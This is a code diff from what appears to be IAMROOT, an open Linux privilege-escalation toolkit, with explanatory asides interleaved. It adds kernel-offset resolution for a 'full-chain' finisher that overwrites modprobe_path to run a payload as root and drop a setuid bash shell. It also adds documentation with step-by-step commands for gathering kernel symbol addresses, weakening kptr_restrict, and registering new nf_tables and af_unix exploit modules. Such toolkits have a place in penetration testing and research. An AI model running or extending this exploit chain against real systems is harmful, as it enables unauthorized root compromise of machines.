+    case OFFSETS_FROM_KALLSYMS: return "kallsyms";
+    case OFFSETS_FROM_SYSMAP:   return "System.map";
+    case OFFSETS_FROM_TABLE:    return "table";
+    }
+    return "?";
+}
+
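+/* Parse an address with strtoull() base 0: accepts "0x..." hex or
+ * plain decimal (a leading "0" is read as octal). Characters after
+ * the number are ignored. Returns 1 on success, 0 on failure. */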
+static int parse_addr(const char *s, uintptr_t *out)
+{
+    if (!s || !*s) return 0;
+    errno = 0;
+    char *end = NULL;
+    unsigned long long v = strtoull(s, &end, 0);
+    if (errno != 0 || end == s) return 0;
+    *out = (uintptr_t)v;
+    return 1;
+}
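`parse_addr()` relies on `strtoull()` with base 0, so the radix is inferred from the prefix, and it does not check what follows the number. For input that comes from an environment variable, a stricter variant may be preferable. The following is a sketch of one under that assumption; `parse_addr_strict` is a hypothetical name, not a function in the tree.

```c
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical strict variant of an address parser. Base 0 makes
 * strtoull() infer the radix: "0x" prefix = hex, leading "0" = octal,
 * anything else = decimal. Unlike a permissive parser, this rejects
 * input with characters left over after the number.
 * Returns 1 and stores the value on success, 0 on failure. */
static int parse_addr_strict(const char *s, uintptr_t *out)
{
    if (!s || !*s) return 0;
    errno = 0;
    char *end = NULL;
    unsigned long long v = strtoull(s, &end, 0);
    if (errno != 0 || end == s || *end != '\0') return 0;
    *out = (uintptr_t)v;
    return 1;
}
```

The octal case is the one most likely to surprise an operator: a value typed as `010` parses as 8, not 10.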
+
+static void read_distro(char *out, size_t sz)
+{
+    out[0] = '\0';
+    FILE *f = fopen("/etc/os-release", "r");
+    if (!f) return;
+    char line[256];
+    while (fgets(line, sizeof line, f)) {
+        if (strncmp(line, "ID=", 3) == 0) {
+            char *p = line + 3;
+            if (*p == '"') p++;
+            size_t i = 0;
+            while (*p && *p != '"' && *p != '\n' && i + 1 < sz) {
+                out[i++] = (char)tolower((unsigned char)*p++);
+            }
+            out[i] = '\0';
+            break;
+        }
+    }
+    fclose(f);
+}
+
+/* ------------------------------------------------------------------
+ * Source 1: environment variables
+ * ------------------------------------------------------------------ */
+static void apply_env(struct iamroot_kernel_offsets *o)
+{
+    const char *v;
+    uintptr_t a;
+
+    if ((v = getenv("IAMROOT_KBASE")) && parse_addr(v, &a)) {
+        if (!o->kbase) o->kbase = a;
+    }
+    if ((v = getenv("IAMROOT_MODPROBE_PATH")) && parse_addr(v, &a)) {
+        if (!o->modprobe_path) {
+            o->modprobe_path = a;
+            o->source_modprobe = OFFSETS_FROM_ENV;
+        }
+    }
+    if ((v = getenv("IAMROOT_POWEROFF_CMD")) && parse_addr(v, &a)) {
+        if (!o->poweroff_cmd) o->poweroff_cmd = a;
+    }
+    if ((v = getenv("IAMROOT_INIT_TASK")) && parse_addr(v, &a)) {
+        if (!o->init_task) {
+            o->init_task = a;
+            o->source_init_task = OFFSETS_FROM_ENV;
+        }
+    }
+    if ((v = getenv("IAMROOT_INIT_CRED")) && parse_addr(v, &a)) {
+        if (!o->init_cred) o->init_cred = a;
+    }
+    if ((v = getenv("IAMROOT_CRED_OFFSET_REAL")) && parse_addr(v, &a)) {
+        if (!o->cred_offset_real) {
+            o->cred_offset_real = (uint32_t)a;
+            o->source_cred = OFFSETS_FROM_ENV;
+        }
+    }
+    if ((v = getenv("IAMROOT_CRED_OFFSET_EFF")) && parse_addr(v, &a)) {
+        if (!o->cred_offset_eff) o->cred_offset_eff = (uint32_t)a;
+    }
+    if ((v = getenv("IAMROOT_UID_OFFSET")) && parse_addr(v, &a)) {
+        if (!o->cred_uid_offset) o->cred_uid_offset = (uint32_t)a;
+    }
+}
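Every assignment in `apply_env()` is guarded by a "field is still zero" check, and the later sources use the same guard, so whichever source supplies a value first keeps it. That precedence rule can be sketched in isolation as below; `first_nonzero` is a hypothetical helper written for this illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Return the first non-zero candidate, scanning in priority order,
 * or 0 if every source came back empty. Index 0 is the
 * highest-priority source. */
static uintptr_t first_nonzero(const uintptr_t *cands, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (cands[i] != 0)
            return cands[i];
    }
    return 0;
}
```

Treating zero as "unset" is what lets the sources be layered without extra bookkeeping, at the cost of never being able to represent a genuine zero value.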
+
+/* ------------------------------------------------------------------
+ * Source 2/3: symbol-table file parsing (System.map or kallsyms share
+ * the same "ADDR TYPE NAME" format).
+ * ------------------------------------------------------------------ */
+static int parse_symfile(const char *path,
+                         struct iamroot_kernel_offsets *o,
+                         enum iamroot_offset_source tag)
+{
+    FILE *f = fopen(path, "r");
+    if (!f) return 0;
+
+    int filled = 0;
+    char line[512];
+    int saw_nonzero = 0;
+    while (fgets(line, sizeof line, f)) {
+        char *p = line;
+        while (*p && isspace((unsigned char)*p)) p++;
+        if (!*p) continue;
+
+        char *end = NULL;
+        unsigned long long addr = strtoull(p, &end, 16);
+        if (end == p || !end) continue;
+        if (addr != 0) saw_nonzero = 1;
+
+        while (*end && isspace((unsigned char)*end)) end++;
+        if (!*end) continue;
+        /* skip type char */
+        end++;
+        while (*end && isspace((unsigned char)*end)) end++;
+        if (!*end) continue;
+
+        char *nl = strchr(end, '\n');
+        if (nl) *nl = '\0';
+
+        if (strcmp(end, "modprobe_path") == 0 && !o->modprobe_path) {
+            o->modprobe_path = (uintptr_t)addr;
+            o->source_modprobe = tag;
+            filled++;
+        } else if (strcmp(end, "poweroff_cmd") == 0 && !o->poweroff_cmd) {
+            o->poweroff_cmd = (uintptr_t)addr;
+            filled++;
+        } else if (strcmp(end, "init_task") == 0 && !o->init_task) {
+            o->init_task = (uintptr_t)addr;
+            o->source_init_task = tag;
+            filled++;
+        } else if (strcmp(end, "init_cred") == 0 && !o->init_cred) {
+            o->init_cred = (uintptr_t)addr;
+            filled++;
+        } else if (strcmp(end, "_text") == 0 && !o->kbase) {
+            o->kbase = (uintptr_t)addr;
+        }
+    }
+    fclose(f);
+
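+    /* /proc/kallsyms returns all-zero addrs under kptr_restrict. Treat
+     * that as "couldn't read", not "actually zero". Every store in the
+     * loop above wrote 0 into a field that was already 0, so values from
+     * earlier sources (env) are intact; only drop the source tags this
+     * pass attached to still-empty fields. */
+    if (!saw_nonzero) {
+        if (!o->modprobe_path) o->source_modprobe = OFFSETS_NONE;
+        if (!o->init_task)     o->source_init_task = OFFSETS_NONE;
+        return 0;
+    }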
+    return filled;
+}
+
+/* ------------------------------------------------------------------
+ * Source 4: embedded table — relative offsets, applied on top of kbase
+ * if we already have one.
+ * ------------------------------------------------------------------ */
+static void apply_table(struct iamroot_kernel_offsets *o)
+{
+    if (!o->kernel_release[0]) return;
+
+    for (const struct table_entry *e = kernel_table; e->release_glob; e++) {
+        if (e->distro_match && o->distro[0]
+            && strncmp(e->distro_match, o->distro, strlen(e->distro_match)) != 0) {
+            continue;
+        }
+        if (fnmatch(e->release_glob, o->kernel_release, 0) != 0) continue;
+
+        /* Match. Apply, but only if we have a kbase (relative offsets
+         * are useless absent that). */
+        if (!o->kbase) return;
+
+        if (!o->modprobe_path && e->rel_modprobe_path) {
+            o->modprobe_path = o->kbase + e->rel_modprobe_path;
+            o->source_modprobe = OFFSETS_FROM_TABLE;
+        }
+        if (!o->poweroff_cmd && e->rel_poweroff_cmd) {
+            o->poweroff_cmd = o->kbase + e->rel_poweroff_cmd;
+        }
+        if (!o->init_task && e->rel_init_task) {
+            o->init_task = o->kbase + e->rel_init_task;
+            o->source_init_task = OFFSETS_FROM_TABLE;
+        }
+        if (!o->init_cred && e->rel_init_cred) {
+            o->init_cred = o->kbase + e->rel_init_cred;
+        }
+        if (!o->cred_offset_real && e->cred_offset_real) {
+            o->cred_offset_real = e->cred_offset_real;
+            o->source_cred = OFFSETS_FROM_TABLE;
+        }
+        if (!o->cred_offset_eff && e->cred_offset_eff) {
+            o->cred_offset_eff = e->cred_offset_eff;
+        }
+        return;
+    }
+}
+
+/* ------------------------------------------------------------------
+ * Top-level resolve()
+ * ------------------------------------------------------------------ */
+int iamroot_offsets_resolve(struct iamroot_kernel_offsets *out)
+{
+    memset(out, 0, sizeof *out);
+
+    struct utsname u;
+    if (uname(&u) == 0) {
+        snprintf(out->kernel_release, sizeof out->kernel_release, "%s", u.release);
+    }
+    read_distro(out->distro, sizeof out->distro);
+
+    /* Defaults — only used if no source overrides. */
+    out->cred_uid_offset = DEFAULT_CRED_UID_OFFSET;
+
+    /* 1. env */
+    apply_env(out);
+
+    /* 2. /proc/kallsyms — only fills if non-zero addrs present */
+    parse_symfile("/proc/kallsyms", out, OFFSETS_FROM_KALLSYMS);
+
+    /* 3. /boot/System.map-<release> */
+    char path[256];
+    snprintf(path, sizeof path, "/boot/System.map-%s", out->kernel_release);
+    parse_symfile(path, out, OFFSETS_FROM_SYSMAP);
+
+    /* 4. embedded table (uses any kbase already discovered) */
+    apply_table(out);
+
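+    /* Fill any remaining struct-offset gaps with defaults so that
+     * arb-write-via-init_task-+offset still has a chance even without
+     * a full source. There is no dedicated "default" source tag, so
+     * these are reported as TABLE; callers cannot tell a compiled-in
+     * default from a matched table entry by the tag alone. */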
+    if (!out->cred_offset_real) {
+        out->cred_offset_real = DEFAULT_CRED_REAL_OFFSET;
+        if (out->source_cred == OFFSETS_NONE) out->source_cred = OFFSETS_FROM_TABLE;
+    }
+    if (!out->cred_offset_eff) {
+        out->cred_offset_eff = DEFAULT_CRED_EFF_OFFSET;
+    }
+
+    int critical = 0;
+    if (out->modprobe_path) critical++;
+    if (out->init_task)     critical++;
+    if (out->cred_offset_real && out->cred_uid_offset) critical++;
+    return critical;
+}
+
+void iamroot_offsets_apply_kbase_leak(struct iamroot_kernel_offsets *off,
+                                      uintptr_t leaked_kbase)
+{
+    if (!leaked_kbase) return;
+    /* Set kbase if we didn't have one, then re-apply the embedded table. */
+    if (!off->kbase) off->kbase = leaked_kbase;
+    apply_table(off);
+}
+
+bool iamroot_offsets_have_modprobe_path(const struct iamroot_kernel_offsets *off)
+{
+    return off && off->modprobe_path != 0;
+}
+
+bool iamroot_offsets_have_cred(const struct iamroot_kernel_offsets *off)
+{
+    return off && off->init_task != 0 && off->cred_offset_real != 0
+           && off->cred_uid_offset != 0;
+}
+
+void iamroot_offsets_print(const struct iamroot_kernel_offsets *off)
+{
+    fprintf(stderr, "[i] offsets: release=%s distro=%s\n",
+            off->kernel_release[0] ? off->kernel_release : "?",
+            off->distro[0]         ? off->distro         : "?");
+    fprintf(stderr, "[i] offsets: kbase=0x%lx  modprobe_path=0x%lx (%s)\n",
+            (unsigned long)off->kbase,
+            (unsigned long)off->modprobe_path,
+            iamroot_offset_source_name(off->source_modprobe));
+    fprintf(stderr, "[i] offsets: init_task=0x%lx (%s)  cred_real=0x%x cred_eff=0x%x uid=0x%x (%s)\n",
+            (unsigned long)off->init_task,
+            iamroot_offset_source_name(off->source_init_task),
+            off->cred_offset_real, off->cred_offset_eff, off->cred_uid_offset,
+            iamroot_offset_source_name(off->source_cred));
+}
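As a rough illustration of the `ADDR TYPE NAME` line format that `parse_symfile()` consumes, the sketch below splits a single line with `sscanf`. It is not part of this commit: `sym_line_parse` and `sym_addr_usable` are hypothetical names, and the real function walks the line by hand rather than using `sscanf`.

```c
#include <stdio.h>

/* Hypothetical helper (not in core/offsets.c): split one
 * "ADDR TYPE NAME" line as found in System.map or /proc/kallsyms.
 * Returns 1 when all three fields were read, 0 otherwise. */
static int sym_line_parse(const char *line, unsigned long long *addr,
                          char *type, char name[128])
{
    /* %llx reads the hex address, " %c" the one-letter symbol type,
     * %127s the symbol name. A trailing "[module]" column, as seen in
     * /proc/kallsyms, is simply left unread. */
    return sscanf(line, "%llx %c %127s", addr, type, name) == 3;
}

/* Unprivileged reads under kptr_restrict yield address 0 for every
 * symbol, so a zero address should be treated as "unknown". */
static int sym_addr_usable(unsigned long long addr)
{
    return addr != 0;
}
```

A caller would feed each `fgets` line to `sym_line_parse()` and skip any symbol for which `sym_addr_usable()` is false, which mirrors the `saw_nonzero` guard in the code above.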
@@ -0,0 +1,93 @@
+/*
+ * IAMROOT — kernel offset resolution
+ *
+ * The 🟡 PRIMITIVE modules each have a trigger that lands a primitive
+ * (heap-OOB write, UAF, etc.). Converting that to root requires
+ * arbitrary write at a specific kernel virtual address — usually
+ * `modprobe_path` (writes a payload path → execve unknown binary →
+ * modprobe runs payload as root) or `current->cred->uid` (set to 0).
+ *
+ * Those addresses vary per kernel build. This file resolves them at
+ * runtime via a four-source chain:
+ *
+ *   1. env vars (IAMROOT_MODPROBE_PATH, IAMROOT_INIT_TASK, ...)
+ *   2. /proc/kallsyms (only useful when kptr_restrict=0 or already root)
+ *   3. /boot/System.map-$(uname -r) (world-readable on some distros)
+ *   4. Embedded table keyed by `uname -r` glob (entries are
+ *      relative-to-_text, applied on top of an EntryBleed kbase leak
+ *      so KASLR is handled)
+ *
+ * Per the verified-vs-claimed bar: offsets are never fabricated. If
+ * none of the four sources resolve, full-chain refuses with an error
+ * pointing the operator at the manual workflow.
+ */
+
+#ifndef IAMROOT_OFFSETS_H
+#define IAMROOT_OFFSETS_H
+
+#include <stdint.h>
+#include <stdbool.h>
+#include <stddef.h>
+
+enum iamroot_offset_source {
+    OFFSETS_NONE         = 0,
+    OFFSETS_FROM_ENV     = 1,
+    OFFSETS_FROM_KALLSYMS = 2,
+    OFFSETS_FROM_SYSMAP  = 3,
+    OFFSETS_FROM_TABLE   = 4,
+};
+
+struct iamroot_kernel_offsets {
+    /* Host fingerprint */
+    char kernel_release[128];  /* uname -r */
+    char distro[64];           /* parsed from /etc/os-release ID= */
+
+    /* Kernel base — needed when offsets are relative-to-_text.
+     * Set by iamroot_offsets_apply_kbase_leak() after EntryBleed runs. */
+    uintptr_t kbase;
+
+    /* Symbol virtual addresses (final, post-KASLR-resolution). */
+    uintptr_t modprobe_path;   /* modprobe_path[] string */
+    uintptr_t poweroff_cmd;    /* poweroff_cmd[] string (alt target) */
+    uintptr_t init_task;       /* init_task struct */
+    uintptr_t init_cred;       /* init_cred struct (or 0) */
+
+    /* Struct offsets — same across most x86_64 kernels but config-sensitive. */
+    uint32_t cred_offset_real; /* offset of real_cred in task_struct */
+    uint32_t cred_offset_eff;  /* offset of cred (effective) in task_struct */
+    uint32_t cred_uid_offset;  /* offset of uid_t uid in cred (almost always 4) */
+
+    /* Where did each field come from. */
+    enum iamroot_offset_source source_modprobe;
+    enum iamroot_offset_source source_init_task;
+    enum iamroot_offset_source source_cred;
+};
+
+/* Best-effort resolution. Returns the number of critical fields
+ * resolved (modprobe_path / init_task / cred offsets count). Caller
+ * checks specific fields it needs.
+ *
+ * Resolution chain is tried in order; later sources do NOT overwrite
+ * a field already set by an earlier source. */
+int iamroot_offsets_resolve(struct iamroot_kernel_offsets *out);
+
+/* Apply a runtime-leaked kbase to any embedded-table entries that
+ * shipped as relative-to-_text offsets. Idempotent. */
+void iamroot_offsets_apply_kbase_leak(struct iamroot_kernel_offsets *off,
+                                      uintptr_t leaked_kbase);
+
+/* Returns true if modprobe_path can be written (the simplest root-pop
+ * finisher). */
+bool iamroot_offsets_have_modprobe_path(const struct iamroot_kernel_offsets *off);
+
+/* Returns true if init_task + cred offsets are known (the cred-uid
+ * finisher). */
+bool iamroot_offsets_have_cred(const struct iamroot_kernel_offsets *off);
+
+/* For diagnostic logging — pretty-print what we resolved to stderr. */
+void iamroot_offsets_print(const struct iamroot_kernel_offsets *off);
+
+/* Helper: return the name of the source enum. */
+const char *iamroot_offset_source_name(enum iamroot_offset_source src);
+
+#endif /* IAMROOT_OFFSETS_H */
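The "later sources do NOT overwrite a field already set by an earlier source" rule from the header comment can be pictured as a scan over per-source candidates for one field. This is a minimal sketch under that reading, not code from the commit; `first_nonzero` is a hypothetical name, and the candidate ordering (env, kallsyms, System.map, table) is assumed from the documented chain.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical illustration of "first non-zero source wins".
 * candidates[] is ordered from highest to lowest priority. Returns the
 * chosen value and stores its index in *which; returns 0 and sets
 * *which to n when every source came back empty. */
static uintptr_t first_nonzero(const uintptr_t *candidates, size_t n,
                               size_t *which)
{
    for (size_t i = 0; i < n; i++) {
        if (candidates[i] != 0) {
            *which = i;
            return candidates[i];
        }
    }
    *which = n;
    return 0;
}
```

The real resolver reaches the same outcome incrementally: each source only writes a field that is still zero, so no array of candidates is ever built.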
@@ -36,5 +36,9 @@ void iamroot_register_stackrot(void);
 void iamroot_register_af_packet2(void);
 void iamroot_register_cgroup_release_agent(void);
 void iamroot_register_overlayfs_setuid(void);
+void iamroot_register_nft_set_uaf(void);
+void iamroot_register_af_unix_gc(void);
+void iamroot_register_nft_fwd_dup(void);
+void iamroot_register_nft_payload(void);

 #endif /* IAMROOT_REGISTRY_H */
@@ -0,0 +1,171 @@
+# IAMROOT — kernel offset resolution
+
+The 7 🟡 PRIMITIVE modules each land a kernel-side primitive (heap-OOB
+write, slab UAF, etc.). The default `--exploit` returns
+`IAMROOT_EXPLOIT_FAIL` after the primitive fires — the verified-vs-claimed
+bar means we don't claim root unless we empirically have it.
+
+`--full-chain` engages the shared finisher (`core/finisher.{c,h}`) which
+converts the primitive to a real root pop via `modprobe_path` overwrite:
+
+```
+attacker → arb_write(modprobe_path, "/tmp/iamroot-mp-<pid>.sh")
+        → execve("/tmp/iamroot-trig-<pid>")     # unknown-format binary
+        → kernel call_modprobe()                # runs the modprobe_path helper as root
+        → /tmp/iamroot-mp-<pid>.sh runs as root
+        → cp /bin/bash /tmp/iamroot-pwn-<pid>; chmod 4755 /tmp/iamroot-pwn-<pid>
+        → caller exec /tmp/iamroot-pwn-<pid> -p
+        → root shell
+```
+
+This requires resolving `&modprobe_path` (a single kernel virtual
+address) at runtime.
+
+## Resolution chain
+
+`core/offsets.c` tries four sources in order, accepting the first
+non-zero value for each field:
+
+1. **Environment variables** — operator override.
+   - `IAMROOT_KBASE=0x...`
+   - `IAMROOT_MODPROBE_PATH=0x...`
+   - `IAMROOT_POWEROFF_CMD=0x...`
+   - `IAMROOT_INIT_TASK=0x...`
+   - `IAMROOT_INIT_CRED=0x...`
+   - `IAMROOT_CRED_OFFSET_REAL=0x...` (offset of `real_cred` in `task_struct`)
+   - `IAMROOT_CRED_OFFSET_EFF=0x...`
+   - `IAMROOT_UID_OFFSET=0x...` (offset of `uid_t uid` in `cred`, usually 0x4)
+
+2. **`/proc/kallsyms`** — only useful when `kernel.kptr_restrict=0`
+   OR you're already root with `kptr_restrict=1` (at `kptr_restrict=2`
+   even root reads zeros). On modern distros (kptr_restrict=1 by
+   default) non-root reads return all zeros and this source is
+   silently skipped.
+
+3. **`/boot/System.map-$(uname -r)`** — world-readable on some distros
+   (older Debian, some Alma builds). Unaffected by `kptr_restrict`.
+
+4. **Embedded table** — keyed by `uname -r` glob, entries are
+   offsets *relative to `_text`* (KASLR-safe). Applied on top of a
+   kbase leak (e.g. EntryBleed). Seeded empty in v0.2.0 — schema-only —
+   to honor the no-fabricated-offsets rule. Operators who verify
+   offsets on a specific kernel build are encouraged to upstream
+   entries.
+
+## How operators populate offsets
+
+### One-shot (preferred for ad-hoc use)
+
+```bash
+# Look up on a kernel you control (as root, once):
+sudo grep -E ' (modprobe_path|init_task|_text)$' /proc/kallsyms
+
+# Use the addresses inline:
+IAMROOT_MODPROBE_PATH=0xffffffff8228e7e0 \
+  iamroot --exploit nf_tables --i-know --full-chain
+```
+
+### Automated dump (preferred for upstreaming)
+
+`iamroot --dump-offsets` walks the four-source chain itself and emits
+a ready-to-paste C struct entry on stdout:
+
+```bash
+sudo iamroot --dump-offsets
+# /* Generated 2026-05-16 by `iamroot --dump-offsets`.
+#  * Host kernel: 5.15.0-56-generic  distro=ubuntu
+#  * Resolved fields: modprobe_path=kallsyms init_task=kallsyms cred=table
+#  * Paste this entry into kernel_table[] in core/offsets.c.
+#  */
+# { .release_glob       = "5.15.0-56-generic",
+#   .distro_match       = "ubuntu",
+#   .rel_modprobe_path  = 0x148e480,
+#   .rel_poweroff_cmd   = 0x148e3a0,
+#   .rel_init_task      = 0x1c11dc0,
+#   .rel_init_cred      = 0x1e0c460,
+#   .cred_offset_real   = 0x738,
+#   .cred_offset_eff    = 0x740,
+# },
+```
+
+Paste the block into `kernel_table[]` in `core/offsets.c`, rebuild,
+and the new entry covers every IAMROOT user on that kernel. Open a
+PR to upstream it.
+
+### Per-host (make System.map readable)
+
+```bash
+sudo chmod 0644 /boot/System.map-$(uname -r)
+iamroot --exploit nf_tables --i-know --full-chain
+```
+
+### Per-boot (lower kptr_restrict)
+
+```bash
+sudo sysctl kernel.kptr_restrict=0
+iamroot --exploit nf_tables --i-know --full-chain
+```
+
+Note: each of these requires root *once*. For a true non-root LPE on
+an unfamiliar host you need either an info-leak module (EntryBleed
+gives kbase) plus an embedded table entry, or out-of-band offset
+acquisition.
+
+## Adding entries to the embedded table
+
+In `core/offsets.c`, `kernel_table[]` carries the schema:
+
+```c
+{ .release_glob       = "5.15.0-25-generic",
+  .distro_match       = "ubuntu",
+  .rel_modprobe_path  = 0x148e480,    // offset from _text
+  .rel_poweroff_cmd   = 0x148e3a0,
+  .rel_init_task      = 0x1c11dc0,
+  .rel_init_cred      = 0x1e0c460,
+  .cred_offset_real   = 0x758,
+  .cred_offset_eff    = 0x760, },
+```
+
+To populate, on the target kernel:
+
+```bash
+# Get _text:
+_text=$(grep ' _text$' /boot/System.map-$(uname -r) | awk '{print $1}')
+
+# Get the symbols you want, subtract _text:
+for sym in modprobe_path poweroff_cmd init_task init_cred; do
+  addr=$(grep " $sym$" /boot/System.map-$(uname -r) | awk '{print $1}')
+  printf "rel_%s = 0x%x\n" $sym $((0x$addr - 0x$_text))
+done
+```
+
+Open a PR with the verified entry and a one-line note on which kernel
+build + distro you tested against. Upstreamed entries make the
+`--full-chain` path work out-of-the-box for that build.
+
+## Verifying success
+
+The payload staged by the shared finisher
+(`iamroot_finisher_modprobe_path()`) creates a sentinel file at
+`/tmp/iamroot-pwn-<pid>` once the kernel's modprobe helper runs it.
+The finisher polls for up to 3 seconds for this file to appear with
+the `S_ISUID` mode bit set. Only when the sentinel materializes does the
+module return `IAMROOT_EXPLOIT_OK` and (unless `--no-shell`) exec
+the setuid bash to drop a root shell.
+
+If the sentinel never appears the module returns `IAMROOT_EXPLOIT_FAIL`
+with a diagnostic. Reasons it might fail even with offsets resolved:
+
+- The arb-write didn't actually land (slab adjacency lost, value-pointer
+  field at unexpected offset, race not won)
+- `modprobe_path` resolution was wrong (KASLR slide miscalculated,
+  embedded-table entry stale)
+- Kernel built with `CONFIG_STATIC_USERMODEHELPER`, which routes every
+  usermode-helper call through one fixed binary and ignores `modprobe_path`
+- AppArmor / SELinux / Lockdown LSM blocks the userspace `modprobe`
+  invocation
+
+## Why `modprobe_path` and not `current->cred->uid = 0`?
+
+The cred-overwrite finisher needs an arb-READ primitive too — to walk
+the task linked list from `init_task` and find the calling process's
+`task_struct`. Most of our 🟡 modules have only an arb-write primitive,
+not a paired read. `modprobe_path` only needs a write to a single
+known global, which is why it's the default finisher.
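The relative-offset arithmetic described under "Adding entries to the embedded table" comes down to one subtraction when an entry is recorded and one addition when it is applied. The sketch below is illustrative and not part of the commit: `rel_to_text` and `rebase` are hypothetical names, and the addresses in the usage note are made-up values.

```c
#include <stdint.h>

/* Hypothetical helper: offset of a symbol from _text, as stored in a
 * rel_* table field. Both inputs come from the same symbol file. */
static uint64_t rel_to_text(uint64_t sym_addr, uint64_t text_addr)
{
    return sym_addr - text_addr;
}

/* Hypothetical helper: turn a stored relative offset back into an
 * absolute address for whatever base the running kernel is using. */
static uint64_t rebase(uint64_t kbase, uint64_t rel)
{
    return kbase + rel;
}
```

For example, a symbol at `0xffffffff8248e480` with `_text` at `0xffffffff81000000` yields the relative value `0x148e480`. Applying that value to a different base, say `0xffffffff8f000000`, gives `0xffffffff9048e480`, which is why the table stays valid across KASLR slides for the same build.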
@@ -17,6 +17,9 @@

 #include "core/module.h"
 #include "core/registry.h"
+#include "core/offsets.h"
+
+#include <time.h>

 #include <getopt.h>
 #include <stdbool.h>
@@ -25,7 +28,7 @@
 #include <string.h>
 #include <unistd.h>

-#define IAMROOT_VERSION "0.1.0"
+#define IAMROOT_VERSION "0.3.1"

 static const char BANNER[] =
 "\n"
@@ -57,6 +60,11 @@ static void usage(const char *prog)
 "                        files in /etc, file capabilities, sudo NOPASSWD\n"
 "                        (complements --scan; answers 'is this box\n"
 "                        generally privesc-exposed?')\n"
+"  --dump-offsets        walk /proc/kallsyms + /boot/System.map and emit a\n"
+"                        C struct-entry ready to paste into core/offsets.c's\n"
+"                        kernel_table[] for the --full-chain finisher.\n"
+"                        Needs root (or kernel.kptr_restrict=0) to read\n"
+"                        kallsyms. See docs/OFFSETS.md.\n"
 "  --version             print version\n"
 "  --help                this message\n"
 "\n"
@@ -64,6 +72,12 @@ static void usage(const char *prog)
 "  --i-know              authorization gate for --exploit modes\n"
 "  --active              in --scan, do invasive sentinel probes (no /etc/passwd writes)\n"
 "  --no-shell            in --exploit modes, prepare but don't drop to shell\n"
+"  --full-chain          in --exploit modes, attempt full root-pop after primitive\n"
+"                        (the 🟡 modules return primitive-only by default; with\n"
+"                        --full-chain they continue to leak → arb-write →\n"
+"                        modprobe_path overwrite. Requires resolvable kernel\n"
+"                        offsets — env vars, /proc/kallsyms, or /boot/System.map.\n"
+"                        See docs/OFFSETS.md.)\n"
 "  --json                machine-readable output (for SIEM/CI)\n"
 "  --no-color            disable ANSI color codes\n"
 "  --format <f>          with --detect-rules: auditd (default), sigma, yara, falco\n"
@@ -83,6 +97,7 @@ enum mode {
    MODE_DETECT_RULES,
    MODE_MODULE_INFO,
    MODE_AUDIT,
+    MODE_DUMP_OFFSETS,
    MODE_HELP,
    MODE_VERSION,
 };
@@ -422,6 +437,103 @@ static int cmd_audit(const struct iamroot_ctx *ctx)
    return 0;
 }

+/* --dump-offsets: walk /proc/kallsyms + /boot/System.map for the running
+ * kernel and emit a ready-to-paste C struct entry for kernel_table[] in
+ * core/offsets.c. Operators run this once on a kernel they have root on
+ * (or kptr_restrict=0), then upstream the entry so --full-chain works
+ * out-of-the-box on that build for everyone. */
+static int cmd_dump_offsets(const struct iamroot_ctx *ctx)
+{
+    (void)ctx;
+    struct iamroot_kernel_offsets off;
+    int n = iamroot_offsets_resolve(&off);
+
+    if (off.kbase == 0) {
+        fprintf(stderr,
+"[-] dump-offsets: couldn't resolve a kernel base address.\n"
+"\n"
+"    /proc/kallsyms returned all-zero addresses (kptr_restrict is\n"
+"    enforcing). /boot/System.map-%s wasn't readable either.\n"
+"\n"
+"    Try one of:\n"
+"      sudo iamroot --dump-offsets\n"
+"      sudo sysctl kernel.kptr_restrict=0; iamroot --dump-offsets\n"
+"      sudo chmod 0644 /boot/System.map-$(uname -r); iamroot --dump-offsets\n",
+            off.kernel_release[0] ? off.kernel_release : "$(uname -r)");
+        return 1;
+    }
+    if (n == 0) {
+        fprintf(stderr,
+"[-] dump-offsets: kbase resolved but no symbols. Sources tried: env,\n"
+"    /proc/kallsyms, /boot/System.map. Check that the kernel symbols\n"
+"    you need (modprobe_path / init_task / poweroff_cmd) actually exist\n"
+"    in the symbol files.\n");
+        return 1;
+    }
+
+    time_t now = time(NULL);
+    struct tm tm; localtime_r(&now, &tm);
+
+    fprintf(stdout,
+"/* Generated %04d-%02d-%02d by `iamroot --dump-offsets`.\n"
+" * Host kernel: %s%s%s\n"
+" * Resolved fields: modprobe_path=%s init_task=%s cred=%s\n"
+" * Paste this entry into kernel_table[] in core/offsets.c.\n"
+" */\n",
+        tm.tm_year + 1900, tm.tm_mon + 1, tm.tm_mday,
+        off.kernel_release,
+        off.distro[0] ? "  distro=" : "",
+        off.distro[0] ? off.distro : "",
+        iamroot_offset_source_name(off.source_modprobe),
+        iamroot_offset_source_name(off.source_init_task),
+        iamroot_offset_source_name(off.source_cred));
+
+    fprintf(stdout,
+"{ .release_glob       = \"%s\",\n", off.kernel_release);
+    if (off.distro[0]) {
+        fprintf(stdout,
+"  .distro_match       = \"%s\",\n", off.distro);
+    } else {
+        fprintf(stdout,
+"  .distro_match       = NULL,\n");
+    }
+    if (off.modprobe_path) {
+        fprintf(stdout,
+"  .rel_modprobe_path  = 0x%lx,\n",
+            (unsigned long)(off.modprobe_path - off.kbase));
+    }
+    if (off.poweroff_cmd) {
+        fprintf(stdout,
+"  .rel_poweroff_cmd   = 0x%lx,\n",
+            (unsigned long)(off.poweroff_cmd - off.kbase));
+    }
+    if (off.init_task) {
+        fprintf(stdout,
+"  .rel_init_task      = 0x%lx,\n",
+            (unsigned long)(off.init_task - off.kbase));
+    }
+    if (off.init_cred) {
+        fprintf(stdout,
+"  .rel_init_cred      = 0x%lx,\n",
+            (unsigned long)(off.init_cred - off.kbase));
+    }
+    if (off.cred_offset_real) {
+        fprintf(stdout,
+"  .cred_offset_real   = 0x%x,\n", off.cred_offset_real);
+    }
+    if (off.cred_offset_eff) {
+        fprintf(stdout,
+"  .cred_offset_eff    = 0x%x,\n", off.cred_offset_eff);
+    }
+    fprintf(stdout,
+"},\n");
+
+    fprintf(stderr,
+"\n[+] dumped %d resolved fields. Verify offsets, then upstream this\n"
+"    entry via a PR to https://github.com/KaraZajac/IAMROOT.\n", n);
+    return 0;
+}
+
 /* --module-info <name>: dump everything we know about one module.
 * Human-readable by default, JSON with --json. Includes the full
 * detection-rule text bodies for that module. */
@@ -584,6 +696,10 @@ int main(int argc, char **argv)
    iamroot_register_af_packet2();
    iamroot_register_cgroup_release_agent();
    iamroot_register_overlayfs_setuid();
+    iamroot_register_nft_set_uaf();
+    iamroot_register_af_unix_gc();
+    iamroot_register_nft_fwd_dup();
+    iamroot_register_nft_payload();

    enum mode mode = MODE_SCAN;
    struct iamroot_ctx ctx = {0};
